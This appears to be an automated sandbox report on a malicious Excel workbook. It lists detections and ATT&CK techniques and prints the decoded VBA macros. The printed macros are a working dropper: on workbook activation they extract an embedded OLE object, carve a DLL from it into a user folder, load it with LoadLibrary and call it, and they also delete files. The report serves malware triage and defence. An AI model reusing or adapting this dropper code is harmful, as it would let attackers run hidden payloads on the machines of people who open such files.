Verdict: MALICIOUS
Risk Score: 440

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
- T1027 Obfuscated Files or Information

Malware Insights
The Excel file contains VBA macros that use WScript.Shell and CreateObject to execute embedded code. A critical heuristic indicates that an ActiveX event launches a decoded Excel4 macro, which likely uses the Shell() function to execute or load a second-stage payload. That payload is identified as an embedded PE executable (embedded_office_00003384.exe), suggesting dropper functionality. The presence of VirtualAlloc and LoadLibrary API references further supports the execution of external or dynamically loaded code.
Heuristics (10):

- ClamAV: Xls.Dropper.Sdrop-7331943-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
- Embedded PE executable (critical, OLE_EMBEDDED_EXE): MZ/PE header found inside document; possible embedded executable
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: `Set WaitForSingle = CreateObject("WScript.Shell")`
- VBA ActiveX event launches decoded Excel4 macro (critical, OLE_VBA_ACTIVEX_XLM_STAGER): VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs or drop payloads while evading AutoOpen and Shell keyword detection; a high-confidence macro stager, not a specific Office parser CVE. Matched lines in script: `Debug.Print Temp1` / `CCount = Application.ExecuteExcel4Macro(Temp1)` / `Debug.Print CCount`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script: `Case 0` / `Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")` / `Case 1`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT)
- Reference to LoadLibrary API (high, SC_STR_LOADLIBRARY)
- Suspicious extracted artifact (high, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC)
Extracted artifacts (3): files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12324 bytes | 1335cf9c55b62e62cfc7e3cb67f2bfd7caed70b057d29bdde217e9f1662bb4c3 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If
End Sub
Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
#If Win64 Then
Public Declare PtrSafe Function Bootsrap Lib _
"libMongo2.dll" () As Integer
Public Declare PtrSafe Function Bootsrap2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
Public Declare Function Bootsrap2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function Bootsrap Lib _
"libMongo1.dll" () As Integer
#End If
Public Sub NewValuje(s As String, nm As String, fl As Long, d_6 As Integer)
Dim d_1 As Long, d_2 As Byte, d_3 As Byte, d_4 As Byte
Dim d_5() As Long
ReDim d_5(1 To fl)
d_5(1) = CByte(50 + 27)
d_5(2) = CByte(50 + 40)
d_5(3) = CByte(50 + 94)
d_1 = FreeFile
Open s For Binary Access Read As d_1
Dim cur As Integer
cur = 1
Do While Not EOF(d_1)
Get d_1, , d_2
If d_2 = d_5(1) Then
Get d_1, , d_3
If d_3 = d_5(2) Then
Get d_1, , d_4
If d_4 = d_5(3) Then
If cur = d_6 Then
For k = 4 To fl
Get d_1, , d_2
d_5(k) = d_2
Next k
Exit Do
Else
cur = cur + 1
End If
End If
End If
End If
Loop
Close d_1
d_1 = FreeFile
Open nm For Binary Lock Read Write As #d_1
For i = LBound(d_5) To UBound(d_5)
Put #d_1, , CByte(d_5(i))
Next i
Close #d_1
End Sub
Public Function ITestModule_GetCase(ByVal lIndex As Long)
If tracemod Then
g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
End If
numcases = numcases + 1
Select Case lIndex
Case 0
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
Case 1
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
Case 2
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
Case 3
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
Case 4
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
Case 5
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
Case 6
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
Case 7
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
Case 8
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
Case 9
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
Case 10
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
Case 11
Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
Case 12
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
Case 13
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
Case 14
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
Case 15
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
Case 16
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
Case 17
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
Case 18
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
Case 19
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
Case 20
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
Case 21
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
Case 22
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
Case 23
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
Case 24
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
Case 25
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
Case 26
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
Case 27
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
Case 28
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
Case 29
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
Case 30
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
End Select
ca.ses(numcases - 1).SetCaseError g_errorobj
ca.ses(numcases - 1).SetCaseProvider g_provobj
Set Locprov = g_provobj
Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Function ITestModule_GetErrorInterface()
Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
Set g_errorobj = pError
If tracemod Then
g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
End If
End Sub
Public Sub ITestModule_SetMallocSpyCallback(pbVoodoo As Byte)
tracemod = False
numcases = 0
'MsgBox ("ITestModule_SetMallocSpyCallback")
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
Set g_provobj = pProvInfo
For i = 0 To numcases - 1
ca.ses(i).SetCaseProvider g_provobj
Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
ITestModule_Terminate = True
End Function
Public Sub AppStart()
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
Dim SpecialPath As String
Set WaitForSingle = CreateObject("WScript.Shell")
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")
UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)
ChDir (UserForm3.TextBox1.Tag)
UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5A3D2CBB-FB46-4DB2-AF06-BE71FA9283E9}{2B3E03C1-B346-4B10-B5BC-52032E0329B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()
End Sub
Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub
Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)
End Sub
Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000
#If VBA7 Then
Private Declare PtrSafe Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
ByVal nIndex As Long) As Long
Private Declare PtrSafe Function SetWindowLong _
Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare PtrSafe Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare PtrSafe Function DrawMenuBar _
Lib "user32" (ByVal hWnd As Long) As Long
#Else
Private Declare Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" ( _
ByVal hWnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong _
Lib "user32" Alias "SetWindowLongA" ( _
ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function DrawMenuBar _
Lib "user32" (ByVal hWnd As Long) As Long
#End If
Public Sub KillArray(ParamArray PathList() As Variant)
On Error Resume Next
For Each Key In PathList
Kill Key
Next Key
On Error GoTo 0
End Sub
Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long
windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)
If show = False Then
SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)
Else
SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)
End If
DrawMenuBar (windowHandle)
End Sub
Attribute VB_Name = "Module3"
Sub test()
Temp = "'" & ThisWorkbook.Path & "\[web.xlsm]Sheet1'!"
Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)
For R = 1 To RCount
For C = 1 To CCount
Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
arr(R, C) = Application.ExecuteExcel4Macro(Temp3)
Next
Next
Range("A1").ReAPI_LENGTH(RCount, CCount).Value = arr
End Sub
Public Sub ReplaceCurrentModule()
NameFav = UserForm3.TextBox1.Tag + "\favorite" + ".xlsx"
ZipName = NameFav + ".zip"
ZipFolder = UserForm3.TextBox1.Tag '& "\UnzTmp"
Dim nm As String
Dim API_LENGTH As Long
Dim d_6 As Integer
nm = UserForm3.TextBox2.Tag + "\libMongo1"
API_LENGTH = 282624
d_6 = 1
#If Win64 Then
nm = UserForm3.TextBox2.Tag + "\libMongo2"
API_LENGTH = 230912
d_6 = 2
#End If
nm = nm + ".d" + "ll"
KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
DoEvents
ThisWorkbook.Sheets.Copy
Application.DisplayAlerts = False
ActiveWorkbook.SaveAs NameFav, FileFormat:=51
DoEvents
ActiveWorkbook.Close
DoEvents
FileCopy NameFav, ZipName
Set oApp = CreateObject("Shell." + "Application")
oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
NewValuje ZipFolder + "\oleObject1.bin", nm, API_LENGTH, d_6
ChDir (UserForm3.TextBox2.Tag)
No_Bootsrap = Bootsrap2(nm)
Bootsrap
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{C6DC58FE-06D5-4E80-95FA-170CB81DE014}{681B466D-E30B-41B1-9314-F7CBD4BFF3AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module4"
Attribute VB_Name = "Module5"
Attribute VB_Name = "Module6"

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| embedded_office_00003384.exe | embedded-pe | Office MZ+PE at offset 0x3384 | 723068 bytes | 4f858f9af608f99073b952a45289a66aa49e1e614a54377cbad72638d9941332 |
Detection (embedded_office_00003384.exe):
- ClamAV: No threats found
- Obfuscation or payload: likely
- Static shellcode analysis recovered command string(s): WScript.Shell
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD00FAA26E/Ole10Native | 526883 bytes | aa7d415120f22ad80905c574ffb39ef59713b52a70790d214c689b634aa314ad |